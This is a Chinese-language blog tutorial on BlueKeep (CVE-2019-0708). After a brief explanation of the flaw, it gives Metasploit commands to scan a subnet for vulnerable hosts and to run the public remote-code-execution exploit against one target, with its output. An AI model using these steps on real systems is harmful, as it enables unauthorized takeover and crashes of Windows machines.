共计 789 个字符,预计需要花费 2 分钟才能阅读完成。
漏洞介绍
2019 年 5 月 14 日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与 2017 年 WannaCry 恶意软件的传播方式类似。
从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的 POC,但要不就是不能利用的 POC,要不就是利用以前漏洞写的 POC,更有甚着点击 attack 后给你惊喜。
搜索目标
msfconsole
search 0708 #扫描可用模块
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块
set RHOSTS 192.168.1.1/24 #设置扫描地址池
run
发现目标
The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
目标很脆弱。目标试图……
开始攻击
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.41
set target 1
run
目标机器可能出现蓝屏现象
target 参数
Exploit target:
Id Name
-- ----
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
正文完